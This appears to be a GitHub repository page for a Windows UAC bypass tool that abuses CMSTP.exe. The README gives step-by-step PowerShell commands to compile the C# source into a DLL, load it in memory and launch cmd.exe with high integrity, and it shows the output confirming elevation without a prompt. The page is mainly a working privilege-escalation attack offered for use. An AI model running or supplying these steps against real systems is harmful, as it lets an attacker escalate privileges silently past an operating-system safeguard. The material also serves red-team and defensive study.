Skip to content

expl0itabl3/uac-bypass-cmstp

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
Source.cs
Source.cs
 
 
test.dll
test.dll
 
 

Repository files navigation

UAC Bypass - CMSTP

Use CMSTP.exe to bypass UAC. All credits go to zc00l: https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

The C# code can be compiled locally using PowerShell:

Add-Type -TypeDefinition ([IO.File]::ReadAllText("C:\Temp\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Temp\test.dll"

This DLL can be loaded directly into PowerShell using Reflection.Assembly:

[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("C:\Temp\test.dll"))

Then each elevated command can be successfully executed:

[CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")

> whoami /groups
--snip--
Mandatory Label\High Mandatory Level

About

Use CMSTP.exe to bypass UAC.

Resources

Readme
Activity

Stars

36 stars

Watchers

3 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages